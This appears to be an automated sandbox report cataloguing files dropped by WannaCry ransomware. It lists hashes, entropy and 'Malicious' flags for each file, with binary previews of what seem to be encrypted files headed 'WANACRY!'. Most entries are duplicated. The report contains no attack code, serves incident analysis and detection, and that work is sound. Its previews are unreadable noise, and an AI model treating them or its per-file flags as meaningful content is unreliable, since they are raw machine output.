                                                                              Preview:WANACRY!..........*U...,....<A......`$VW..y.!._.G.....6.1....!...O+.......9.g.......=.Y....../.-.T.D.h..Pl\.~.^.H..L.PcxG.)G...`..~......5.xz{..E....+..4w".0.EQAG.&.g....s.j...7y..u..;N..L......C.....*8hR.y.rk.U...."..].#......av.....x.G>.Z.O.(|XG.....2.......X.?.wl6Y.%......O.HU.....7.N........S..gl\..h6.~(}...x........(....B........U......T.BE.,-L..&zR...qe.|..L.;z../.9M.*.q0....o..CY.M..p.......n.._...\.,_.l?.EuS<...w>.n.)....a...j1?../.O....,...[$k.h.$.A..I...Q..MY......zy9...EVk...95.kd...*o.0K..]..)..^=.D.-\...3$..MYm.(.y..M.^.+:%:.1.NKpo/!...0..H3c.....].l.!f.7.(..Q5-{0.......|`.P...BQ/N.. .9......X.~/v..=B..h0+~6.. ..u."......qbG.........`d..-~.>...%.A......V.|...4.."....)m./...+...k.^.Y.3........2M...wb.p.'MD).....T+.$..<.jgo..=...&UG&..5^....H.....w.i<.Q..8.9B%...*...k.C.f......2Wz.g.E..."..jrn..7f.P,....!..~...m.H......O.R....<...:ku.gm.ZF5J...-.........+;.C.a...:IZ.QE...G.3e...1Vw.!.-......Y......._..B..:a:..{[.5......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.580634000249976
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEx5ttbS75T9xP0AR9C+Q29IXsLWQ9Docwit4crr1dVJwaWMiFP6:bks254gC+Qq/SiDocz+u1dVJvZ
                                                                              MD5:F676E6BB7F7458F5198B2869CE8FD2C4
                                                                              SHA1:16E0C1841AE9B2BB501E2497C84EC7571B36810C
                                                                              SHA-256:28F0E8AE54443C5DC616AE72CB8652538CA04A04F00E5966FECE3DBB23B6E3C7
                                                                              SHA-512:63C4A9E3A34252B8A38B6731EB7BF5E993EA6CC7020928861E8BD838BCF708CF796A6284B884D309DAC95744F11EA1E654A71A4D86503D52CD046FE6E0636F7F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Z.%.AT....X...zx.*m.k....$h. ;1.'.Z..q>..W<..J..z..?J.iC..R.<..{zx.0oU....".R.#...]..7..r....P+.+.Rj..~......1`@...Y4T...%rO..U....r.E9.{u.?..e*...f..."...[K....S.UZ."x...lzw..}.r^.s.h.R..K.+.......;..Z<~%Y....j=.....Z.P X[..u.GA.h>o....'.......6..P.Lc@...iP.....1.....T...T..yv..sm.g..%....6.5.=...s.X.$./Gv`.....e%...e....6`.....$..].o=..,...'.'.Z.uS......._..4....#%...Z.9l.rU.k.......?..5.B4;o......,..:.#2..w...W...N.._X;y....J.+wF5......dk,..cD..\w...,.zd..E......&La...,b...E.F#.7....U.{..u...3....b....?L.9...r....&....g..N..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.580634000249976
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEx5ttbS75T9xP0AR9C+Q29IXsLWQ9Docwit4crr1dVJwaWMiFP6:bks254gC+Qq/SiDocz+u1dVJvZ
                                                                              MD5:F676E6BB7F7458F5198B2869CE8FD2C4
                                                                              SHA1:16E0C1841AE9B2BB501E2497C84EC7571B36810C
                                                                              SHA-256:28F0E8AE54443C5DC616AE72CB8652538CA04A04F00E5966FECE3DBB23B6E3C7
                                                                              SHA-512:63C4A9E3A34252B8A38B6731EB7BF5E993EA6CC7020928861E8BD838BCF708CF796A6284B884D309DAC95744F11EA1E654A71A4D86503D52CD046FE6E0636F7F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Z.%.AT....X...zx.*m.k....$h. ;1.'.Z..q>..W<..J..z..?J.iC..R.<..{zx.0oU....".R.#...]..7..r....P+.+.Rj..~......1`@...Y4T...%rO..U....r.E9.{u.?..e*...f..."...[K....S.UZ."x...lzw..}.r^.s.h.R..K.+.......;..Z<~%Y....j=.....Z.P X[..u.GA.h>o....'.......6..P.Lc@...iP.....1.....T...T..yv..sm.g..%....6.5.=...s.X.$./Gv`.....e%...e....6`.....$..].o=..,...'.'.Z.uS......._..4....#%...Z.9l.rU.k.......?..5.B4;o......,..:.#2..w...W...N.._X;y....J.+wF5......dk,..cD..\w...,.zd..E......&La...,b...E.F#.7....U.{..u...3....b....?L.9...r....&....g..N..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):329976
                                                                              Entropy (8bit):7.999459249185393
                                                                              Encrypted:true
                                                                              SSDEEP:6144:AmPh9df/tFPtuj+XdlFln5HIbipA42lQnocyT90W4SvwyJhQ2u7ZyKh7DRCTh:PPhff/tDMGdlhGlHozyTuW340W2uwmM9
                                                                              MD5:A08AD5DDC9858979641B4DC23CB5B308
                                                                              SHA1:EBB233BAB75DB3E8CE12FFB215E2D311B806D7ED
                                                                              SHA-256:3DAE55A9DC396FD6C7CB3C425781DC94F9AD082A10E08192A0C1D5A7771E1DCD
                                                                              SHA-512:1E43F2A6FEC231B09D0F71D31A3879C81F69970F7832B93570B0209F307BA6845BA3D066E5C96BA65E7326226F6D19C1B7CF62B499C5089DEFFCEC84E444FB94
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......]KcD=...Sk........G..^B...H-....p..........qx..u.......S.TAN..v.....v..l.Y...y9.@e.u......?.....F`..4....S....0o..wk..O%*...O._b.%a&....=|G........$...~.i..r.Z._..%..C....o.%:.....]s.............N.Ft0..:.B......1.#>.R.v...7jV.x................u_..]{KG..B~.........<..c.w0f..qV...9...@x.>.!.c..~ha..1&.!.w._.k..2.u....]...U..'Z.>6......C...o.Y]...Cj..X...61.7\OTRB..qH....9.V./.j...).FG.6A.Vq...gx.Zd#...@8..d./H.c..d.4e.d......v...{"......u...tt....ru..E^..W.9...s8..AiI.........@..y...1@O..6..-{.;-P.j.pH..4.B=.b.#..?(.C..]UuE2..p..V;D.4...)..`..p%.W...&....k..{.Rp.q-5...'pf..R.8.g..+$QE.iE.....Z.a'......f. .S`...].v..<.&_..%.}....yx.Ya\.|...H..|.-...e.J'KO.J.Z..kf3..8.z.......p..:...!f.>..Qw.K...T.+.3uo.;.g....#.....8.G70h/#...U..)B4}[..z.g.7^.\Y.........$.......V....PU.......>...=.0.J/i...2....q............R.w.....g.}.@.D......(q..7._..l...\.`.......s....E2..pIE..XR....`.x.../......./..C....S.......>.!`.:o..q._..6.dT...$CA.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):329976
                                                                              Entropy (8bit):7.999459249185393
                                                                              Encrypted:true
                                                                              SSDEEP:6144:AmPh9df/tFPtuj+XdlFln5HIbipA42lQnocyT90W4SvwyJhQ2u7ZyKh7DRCTh:PPhff/tDMGdlhGlHozyTuW340W2uwmM9
                                                                              MD5:A08AD5DDC9858979641B4DC23CB5B308
                                                                              SHA1:EBB233BAB75DB3E8CE12FFB215E2D311B806D7ED
                                                                              SHA-256:3DAE55A9DC396FD6C7CB3C425781DC94F9AD082A10E08192A0C1D5A7771E1DCD
                                                                              SHA-512:1E43F2A6FEC231B09D0F71D31A3879C81F69970F7832B93570B0209F307BA6845BA3D066E5C96BA65E7326226F6D19C1B7CF62B499C5089DEFFCEC84E444FB94
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......]KcD=...Sk........G..^B...H-....p..........qx..u.......S.TAN..v.....v..l.Y...y9.@e.u......?.....F`..4....S....0o..wk..O%*...O._b.%a&....=|G........$...~.i..r.Z._..%..C....o.%:.....]s.............N.Ft0..:.B......1.#>.R.v...7jV.x................u_..]{KG..B~.........<..c.w0f..qV...9...@x.>.!.c..~ha..1&.!.w._.k..2.u....]...U..'Z.>6......C...o.Y]...Cj..X...61.7\OTRB..qH....9.V./.j...).FG.6A.Vq...gx.Zd#...@8..d./H.c..d.4e.d......v...{"......u...tt....ru..E^..W.9...s8..AiI.........@..y...1@O..6..-{.;-P.j.pH..4.B=.b.#..?(.C..]UuE2..p..V;D.4...)..`..p%.W...&....k..{.Rp.q-5...'pf..R.8.g..+$QE.iE.....Z.a'......f. .S`...].v..<.&_..%.}....yx.Ya\.|...H..|.-...e.J'KO.J.Z..kf3..8.z.......p..:...!f.>..Qw.K...T.+.3uo.;.g....#.....8.G70h/#...U..)B4}[..z.g.7^.\Y.........$.......V....PU.......>...=.0.J/i...2....q............R.w.....g.}.@.D......(q..7._..l...\.`.......s....E2..pIE..XR....`.x.../......./..C....S.......>.!`.:o..q._..6.dT...$CA.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1608
                                                                              Entropy (8bit):7.865399545202258
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkd5FTucG+aD4mLevtV3TpnKVGal6v+AHElyWv/:oJScVS41v7VnKwif8ElXv/
                                                                              MD5:B7AD54F868833D936631D9321D2B1EE2
                                                                              SHA1:CC1DCA58AB5B741E64489E9F7E76D5D15CB40A78
                                                                              SHA-256:16D42FCCE5C8583D6241A658D0711BC1C2AA7E4ECB43F35234CECE8F2C2AD59F
                                                                              SHA-512:8EFA2D8C1BAA5CD10C565241914420D1197E6B71549C4310B2EA5F7618716A3B162A3ED5D9FF1EAEB87C2385509A94EB800913E71D6EF88E0A91E67D6B549ACC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O..>(.B.....D...Y... ......h.4..Gyl7.<....ZfO....#.`.${.'0..~..&.P..G....Q.Mf.....)...d....R...).&.........(H_)}..Dr._..+.......J.I.d..BY.....2.;..oX.$`.e'..Wh.....8...,..H.q.qY..fY......y.b]...D1..I.;....(...@j..ra5.v^.L.e..rB.\......j..W.H.....%.......%j.A..Z..i.r..t.. Jn........3!inF....E"1...._.{..&7......{..o.... ..}s..Y$..T.i..(....{..mH.2..@...u%.@.........x.R....mx!.}MM...P^...lV..........W.qB...'...u.F}..*....;..z_.FNH.4.2.?..:v...u..{.."}.......(.r..En.G....Sw......z.+...r;..F.h.Rx.V.3....#@I.z.[........Os:".o..%T..F`i2;.A..{......n.g{.+.=..\.fI<#......U...s.....M.U....]...L. C... ..ZX..\Zuv/t.N..#9..;..bZ....,pQ....^....H..b.EG.._..8..C.......b.L......2..|.-!.2v........P....P..k5p......=.7.V=S.*-$..e..>..I.rr...GE.Qh..M.}H..,gy[.;t4..=.SD*....5j.1p3..\n*....x.U......d..l..Y...B+...K>2..x.(8..........(..D'.}..y..A5....k.........JIpg@....V..%b.....Q.. .b....b...)...,V...4..4.z.`...... ?r...$Z/...[iH..,r...r.`.f...}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1608
                                                                              Entropy (8bit):7.865399545202258
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkd5FTucG+aD4mLevtV3TpnKVGal6v+AHElyWv/:oJScVS41v7VnKwif8ElXv/
                                                                              MD5:B7AD54F868833D936631D9321D2B1EE2
                                                                              SHA1:CC1DCA58AB5B741E64489E9F7E76D5D15CB40A78
                                                                              SHA-256:16D42FCCE5C8583D6241A658D0711BC1C2AA7E4ECB43F35234CECE8F2C2AD59F
                                                                              SHA-512:8EFA2D8C1BAA5CD10C565241914420D1197E6B71549C4310B2EA5F7618716A3B162A3ED5D9FF1EAEB87C2385509A94EB800913E71D6EF88E0A91E67D6B549ACC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O..>(.B.....D...Y... ......h.4..Gyl7.<....ZfO....#.`.${.'0..~..&.P..G....Q.Mf.....)...d....R...).&.........(H_)}..Dr._..+.......J.I.d..BY.....2.;..oX.$`.e'..Wh.....8...,..H.q.qY..fY......y.b]...D1..I.;....(...@j..ra5.v^.L.e..rB.\......j..W.H.....%.......%j.A..Z..i.r..t.. Jn........3!inF....E"1...._.{..&7......{..o.... ..}s..Y$..T.i..(....{..mH.2..@...u%.@.........x.R....mx!.}MM...P^...lV..........W.qB...'...u.F}..*....;..z_.FNH.4.2.?..:v...u..{.."}.......(.r..En.G....Sw......z.+...r;..F.h.Rx.V.3....#@I.z.[........Os:".o..%T..F`i2;.A..{......n.g{.+.=..\.fI<#......U...s.....M.U....]...L. C... ..ZX..\Zuv/t.N..#9..;..bZ....,pQ....^....H..b.EG.._..8..C.......b.L......2..|.-!.2v........P....P..k5p......=.7.V=S.*-$..e..>..I.rr...GE.Qh..M.}H..,gy[.;t4..=.SD*....5j.1p3..\n*....x.U......d..l..Y...B+...K>2..x.(8..........(..D'.}..y..A5....k.........JIpg@....V..%b.....Q.. .b....b...)...,V...4..4.z.`...... ?r...$Z/...[iH..,r...r.`.f...}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):552536
                                                                              Entropy (8bit):7.99962405056816
                                                                              Encrypted:true
                                                                              SSDEEP:12288:JGci4mxIBSEkAXGNiqTitFQhUTgYcFYBHEjr8+khNBCXP6RLbXmOqys:JHiOBbjciYitGaTOyyZ0RLYN
                                                                              MD5:2A6EED072EFA004646B064A91D0C9D72
                                                                              SHA1:85D45F317A242BD1258E05D36D71A5708DB405EA
                                                                              SHA-256:F1359A135E84F428B0211637546B44363A4D765446D276AE33A7FD39F8ED30AC
                                                                              SHA-512:CFB63627281232853A29785F6C993EAC329C326151C31C65447A408210ADD87588044AED7055CC4EE895ACDF203B71B967AE86A44DBEBBF369AE5ACD41780725
                                                                              Malicious:true
                                                                              Preview:WANACRY!......:.YF+....).Tcu9J}.-./:Z..f.wI,....&7..r......... ...lH.....0+..7...Y{.R2.d.,}B...@O......^l..eO...9.2.......@..+`P.^..N.7.}`..I@..W<.....e. ."..6S'..s%^_.O......Q.>..F.....O.S.Z. Rq.E.Xl..f..&...8..].BCe....T..U..s..O.}...;.W`.O#.@.C...w..5....9m.......e....^....cZ.v...8....[..a..J...l.P.o..g..>..^7.....4OsM.|..(V8....7.0\8.......'...iff~F...3.dt.K...rX..+FU..v.S.j.z...=....H.).Qv.\.wo.+'.G.yP.......e.:4...R}.48..v.6..)7....vC..^...`B:....g..U..@.E.{..I;.)c:..Y=.8..#...|x.j.}N....`.<...)xUS..'+.x...rr..z.^...?....e....@..s?.km.>.Y*..N..2..O.N..smj.zG;...].>a.#gs..;..!.... ..Je.......`..,#tH.5>.*.UA......;...w.....+#.W<K0.]s......C~...G...l/.p..&..E<y.#7....Q,X.'..Y.X.~..........E...B5...f..b.dsWi...r.a.%Y.......Y-...*-.VG..#.....!.......8A^I._.....x<.)..`I..f4.5L.....5...xX..N.,V@...G.g..*.jW&......w..Rs.>HhwJ.<...'.96KaV.>....`.....R.X<..9..X....J..,EJ...-._M.X..uuq..~.&h$v....T...?....pF./Q@|..%w$...R$[SJ..'........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):552536
                                                                              Entropy (8bit):7.99962405056816
                                                                              Encrypted:true
                                                                              SSDEEP:12288:JGci4mxIBSEkAXGNiqTitFQhUTgYcFYBHEjr8+khNBCXP6RLbXmOqys:JHiOBbjciYitGaTOyyZ0RLYN
                                                                              MD5:2A6EED072EFA004646B064A91D0C9D72
                                                                              SHA1:85D45F317A242BD1258E05D36D71A5708DB405EA
                                                                              SHA-256:F1359A135E84F428B0211637546B44363A4D765446D276AE33A7FD39F8ED30AC
                                                                              SHA-512:CFB63627281232853A29785F6C993EAC329C326151C31C65447A408210ADD87588044AED7055CC4EE895ACDF203B71B967AE86A44DBEBBF369AE5ACD41780725
                                                                              Malicious:true
                                                                              Preview:WANACRY!......:.YF+....).Tcu9J}.-./:Z..f.wI,....&7..r......... ...lH.....0+..7...Y{.R2.d.,}B...@O......^l..eO...9.2.......@..+`P.^..N.7.}`..I@..W<.....e. ."..6S'..s%^_.O......Q.>..F.....O.S.Z. Rq.E.Xl..f..&...8..].BCe....T..U..s..O.}...;.W`.O#.@.C...w..5....9m.......e....^....cZ.v...8....[..a..J...l.P.o..g..>..^7.....4OsM.|..(V8....7.0\8.......'...iff~F...3.dt.K...rX..+FU..v.S.j.z...=....H.).Qv.\.wo.+'.G.yP.......e.:4...R}.48..v.6..)7....vC..^...`B:....g..U..@.E.{..I;.)c:..Y=.8..#...|x.j.}N....`.<...)xUS..'+.x...rr..z.^...?....e....@..s?.km.>.Y*..N..2..O.N..smj.zG;...].>a.#gs..;..!.... ..Je.......`..,#tH.5>.*.UA......;...w.....+#.W<K0.]s......C~...G...l/.p..&..E<y.#7....Q,X.'..Y.X.~..........E...B5...f..b.dsWi...r.a.%Y.......Y-...*-.VG..#.....!.......8A^I._.....x<.)..`I..f4.5L.....5...xX..N.,V@...G.g..*.jW&......w..Rs.>HhwJ.<...'.96KaV.>....`.....R.X<..9..X....J..,EJ...-._M.X..uuq..~.&h$v....T...?....pF./Q@|..%w$...R$[SJ..'........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):328
                                                                              Entropy (8bit):7.263125013690666
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEdCTid7A33VII4GZ9gXZWMsa7VKF/VQDhmjpshHu2DLSON9//ZD8qfZ1GDa8n:bkEdoiS33VIfa9KU2+/chmCHbLSONpRA
                                                                              MD5:40CCC53B88748B04B7240C33E9E246B1
                                                                              SHA1:2C47CAFEAF69F796CCDCC8BB6255B3D5AA49ECC6
                                                                              SHA-256:B61737632319B0E045E93D3A8E16D5F2C0C519144FC60A1927F65D2357EAB5E7
                                                                              SHA-512:C1991398911F1D30C3A75BED198441100A1A695B02E26C6575A6E2F3F36347735AA6A20CB0F65B10F96CD8DD19882400D325A289D85D6B2B069C9BB7566D8B2E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....R?..j..y3..u......HU.D..n..."6....(............5.0.......&....lG...oJ)..1(.,%..`.9#..[..+.S......C...<=.u<...!.,.o...'/~D.wy:-..S....ymeYQ....s..T g.U./.t.{..X.u:..Lp...%?..e.H...D.IJ......?..D..YYT......A"..F{D.<[...........6|>yuH..d.o.......%........?6..2%...].j.+#..&...s/..`..W...}R...t.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):328
                                                                              Entropy (8bit):7.263125013690666
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEdCTid7A33VII4GZ9gXZWMsa7VKF/VQDhmjpshHu2DLSON9//ZD8qfZ1GDa8n:bkEdoiS33VIfa9KU2+/chmCHbLSONpRA
                                                                              MD5:40CCC53B88748B04B7240C33E9E246B1
                                                                              SHA1:2C47CAFEAF69F796CCDCC8BB6255B3D5AA49ECC6
                                                                              SHA-256:B61737632319B0E045E93D3A8E16D5F2C0C519144FC60A1927F65D2357EAB5E7
                                                                              SHA-512:C1991398911F1D30C3A75BED198441100A1A695B02E26C6575A6E2F3F36347735AA6A20CB0F65B10F96CD8DD19882400D325A289D85D6B2B069C9BB7566D8B2E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....R?..j..y3..u......HU.D..n..."6....(............5.0.......&....lG...oJ)..1(.,%..`.9#..[..+.S......C...<=.u<...!.,.o...'/~D.wy:-..S....ymeYQ....s..T g.U./.t.{..X.u:..Lp...%?..e.H...D.IJ......?..D..YYT......A"..F{D.<[...........6|>yuH..d.o.......%........?6..2%...].j.+#..&...s/..`..W...}R...t.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16456
                                                                              Entropy (8bit):7.987097236674014
                                                                              Encrypted:false
                                                                              SSDEEP:384:CjMmxOVEhrE/I0RzLIOC6lC4OXtM0iDqBooUm7O:CYNESbzCDLdM/DIoV
                                                                              MD5:98094A0E1C662BD63BEC47A2E6D1FED1
                                                                              SHA1:DF3EDDC637B10F502B52543768983BAB8E832A2B
                                                                              SHA-256:96FDA52753CD5702051D1C357CBFB60A44DBFBB45E56F87CD7904A65429F0F41
                                                                              SHA-512:1AD65DD108E6AFB99B3614B5DAA8EFACE768563A1186641D02AE9AD1B412EC3A915EE224A30FA2A70B174C79EB263C7AC3F642309C314B2C91378C38FF3FB07E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......?\.8l.6.!4.....v.b...48j...o..'..a.;=.......*.vF.....%....{,P..7..3.|..DJ..}4.r==.D......._G.Y&s...j..Q.v<....!.t.....Z.......N...KT...D..M.*...h..F......:cS...AE&..C..zuJc}-)x.7....../w..v,...N.....t?s.,...!z7QW.2......\.Lh7cAi...X...".P.....$?......{....%....+..0(.....lH..tt..^.I]w6..Y~.9.......r8e.#.m2.........ua% }..'-.9..3.5...^..Q?hE........+O..`...^M].."..4wCB{.A.....{.P^.....4.A..d?&.....!]~.._Uw|......ERT)W....e.@.P...l....M.j&....Y=e.4.(.-_..../.Tj..0pu|R..._..V..!.}.0%Qi..^.LO.....`.6..N.A.:..,!z.'..V....O.D..<.z..'...gdy..... }\..!.j..$.......(q%..+.NR..<\..|..v|.....<......../B.%4..7... ..E5...j4|[|rQ%$Z.3.....F.U.k.1..02...)+~.Q..[...k/.F.....z.9...-4.....0....xz.p`s..U..........Q.\R.c.#......M..<....a.L.....z.....c.p.B)rgC......8.....vf.....kI.8F.......A.Ta. .%..].}..x.....L.#.z.4...i...d.e......7.....x..U.:1Hf.J...=k.2|x7[?.i4.....,....+..E....7...6..k..b..W.<(.S.r.....+i'/......G..T.'.ydx...1".p......C.p.S1\..E.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16456
                                                                              Entropy (8bit):7.987097236674014
                                                                              Encrypted:false
                                                                              SSDEEP:384:CjMmxOVEhrE/I0RzLIOC6lC4OXtM0iDqBooUm7O:CYNESbzCDLdM/DIoV
                                                                              MD5:98094A0E1C662BD63BEC47A2E6D1FED1
                                                                              SHA1:DF3EDDC637B10F502B52543768983BAB8E832A2B
                                                                              SHA-256:96FDA52753CD5702051D1C357CBFB60A44DBFBB45E56F87CD7904A65429F0F41
                                                                              SHA-512:1AD65DD108E6AFB99B3614B5DAA8EFACE768563A1186641D02AE9AD1B412EC3A915EE224A30FA2A70B174C79EB263C7AC3F642309C314B2C91378C38FF3FB07E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......?\.8l.6.!4.....v.b...48j...o..'..a.;=.......*.vF.....%....{,P..7..3.|..DJ..}4.r==.D......._G.Y&s...j..Q.v<....!.t.....Z.......N...KT...D..M.*...h..F......:cS...AE&..C..zuJc}-)x.7....../w..v,...N.....t?s.,...!z7QW.2......\.Lh7cAi...X...".P.....$?......{....%....+..0(.....lH..tt..^.I]w6..Y~.9.......r8e.#.m2.........ua% }..'-.9..3.5...^..Q?hE........+O..`...^M].."..4wCB{.A.....{.P^.....4.A..d?&.....!]~.._Uw|......ERT)W....e.@.P...l....M.j&....Y=e.4.(.-_..../.Tj..0pu|R..._..V..!.}.0%Qi..^.LO.....`.6..N.A.:..,!z.'..V....O.D..<.z..'...gdy..... }\..!.j..$.......(q%..+.NR..<\..|..v|.....<......../B.%4..7... ..E5...j4|[|rQ%$Z.3.....F.U.k.1..02...)+~.Q..[...k/.F.....z.9...-4.....0....xz.p`s..U..........Q.\R.c.#......M..<....a.L.....z.....c.p.B)rgC......8.....vf.....kI.8F.......A.Ta. .%..].}..x.....L.#.z.4...i...d.e......7.....x..U.:1Hf.J...=k.2|x7[?.i4.....,....+..E....7...6..k..b..W.<(.S.r.....+i'/......G..T.'.ydx...1".p......C.p.S1\..E.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2088
                                                                              Entropy (8bit):7.9036066638475875
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkxWg3a8K7zMSwpi7Fogvzxk6AbtFylL1p1r2ef3:o0gq7ztwpiJogvzuhvIL3
                                                                              MD5:C830855692FBF77D95BE03556FEF7FC2
                                                                              SHA1:25CA3D230D67E74DE943A9B5DDB26EA68EEC5081
                                                                              SHA-256:BF01D8610AF7F570DCD0597581547EE7A43C47AC14E1D49139F0416B945A13C3
                                                                              SHA-512:1A7A89BA2C8172462620D858D8C197AA2D06E600F72D3211FD3BB0564BA37145475C86A8CD069985067333F101CECD4FF90EC2676EB1A0CC6785559E2B69DED3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l.x.`....\g..?.....h.e....m.g.t1.s...W<....V..5d..=..U1:.e....g,. .F..&k...b.....yy..w-.{.1GkT,:#.P.h!..AM..v...a..K.Y>v5....g{u.].?...k.; .3B..%.|......ig.=...X..]<_.f~....A6.IE..f^.....z...q/..p.\...I?C.".`.....Pg..p.J6R..kT1......Q...=.+c4..............(.k@.{|....w......./9.....i6......5...j."...YD.}. ...\..,..-....|.h.Uv.Y..A.e..S2.Z.....;.......w....C....... g.4T......QL@.l.3.....1.3&...A.G.Y....r.%u....i..."p.Y...QiBQ..N:3.9.Z..@.pwA~.......p.7......oya=.P.....Zs....2u..M..B#.V.M.mx.4...v..c....s...4.;.^^e...........@ ..,|..G..;K.#L.{.,<....'lf-C. .9.uB../.ur...\...Z....L.......=.Q.(*j8...k=..Z..Q.Jm....7..xP....0./...v]..........I8...&.Op.\Jf..C.q..yG.;`............}..^.v.....,.....aiX u.5.........l.z..,.V-d........W..ZYvI..=+...9.6.<...\.Vo%...)...J..(".Z5.((.#s....i..w.VR....V...Q..`kI=..^.....w..>.S;.K.s.i.:..[~.....Z.`.U}Q..7.-...!m/...t=9..x.r..OS2.L...S'...!...!`.;@%.......B....V...h...0...?.....e..4..K...)."}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2088
                                                                              Entropy (8bit):7.9036066638475875
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkxWg3a8K7zMSwpi7Fogvzxk6AbtFylL1p1r2ef3:o0gq7ztwpiJogvzuhvIL3
                                                                              MD5:C830855692FBF77D95BE03556FEF7FC2
                                                                              SHA1:25CA3D230D67E74DE943A9B5DDB26EA68EEC5081
                                                                              SHA-256:BF01D8610AF7F570DCD0597581547EE7A43C47AC14E1D49139F0416B945A13C3
                                                                              SHA-512:1A7A89BA2C8172462620D858D8C197AA2D06E600F72D3211FD3BB0564BA37145475C86A8CD069985067333F101CECD4FF90EC2676EB1A0CC6785559E2B69DED3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l.x.`....\g..?.....h.e....m.g.t1.s...W<....V..5d..=..U1:.e....g,. .F..&k...b.....yy..w-.{.1GkT,:#.P.h!..AM..v...a..K.Y>v5....g{u.].?...k.; .3B..%.|......ig.=...X..]<_.f~....A6.IE..f^.....z...q/..p.\...I?C.".`.....Pg..p.J6R..kT1......Q...=.+c4..............(.k@.{|....w......./9.....i6......5...j."...YD.}. ...\..,..-....|.h.Uv.Y..A.e..S2.Z.....;.......w....C....... g.4T......QL@.l.3.....1.3&...A.G.Y....r.%u....i..."p.Y...QiBQ..N:3.9.Z..@.pwA~.......p.7......oya=.P.....Zs....2u..M..B#.V.M.mx.4...v..c....s...4.;.^^e...........@ ..,|..G..;K.#L.{.,<....'lf-C. .9.uB../.ur...\...Z....L.......=.Q.(*j8...k=..Z..Q.Jm....7..xP....0./...v]..........I8...&.Op.\Jf..C.q..yG.;`............}..^.v.....,.....aiX u.5.........l.z..,.V-d........W..ZYvI..=+...9.6.<...\.Vo%...)...J..(".Z5.((.#s....i..w.VR....V...Q..`kI=..^.....w..>.S;.K.s.i.:..[~.....Z.`.U}Q..7.-...!m/...t=9..x.r..OS2.L...S'...!...!`.;@%.......B....V...h...0...?.....e..4..K...)."}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1394952
                                                                              Entropy (8bit):7.9998560902356965
                                                                              Encrypted:true
                                                                              SSDEEP:24576:jmkBg1P5f+oe2mANENv9u7Y4Xbxv2TcI6v1jpcD7T:CkuxK2mAGlG1gIvDU
                                                                              MD5:509CDA1B535BCA521B12DEBA1B1C654A
                                                                              SHA1:2CFE31753F803E3331C78DD5C8027E3A8EE12CAD
                                                                              SHA-256:E2AC36123BE80A2315CBACC61A194FE19581F7FED4FF8C6D10F25880AE0197F7
                                                                              SHA-512:2F94C5A3E1420ACDF9AEE96423215A48B79AEB488110913722C48EA6B1A55A899C9C2009FE895675675D6BED47A1FC937620EEF77DF6B38B5610B8B1009BD39E
                                                                              Malicious:true
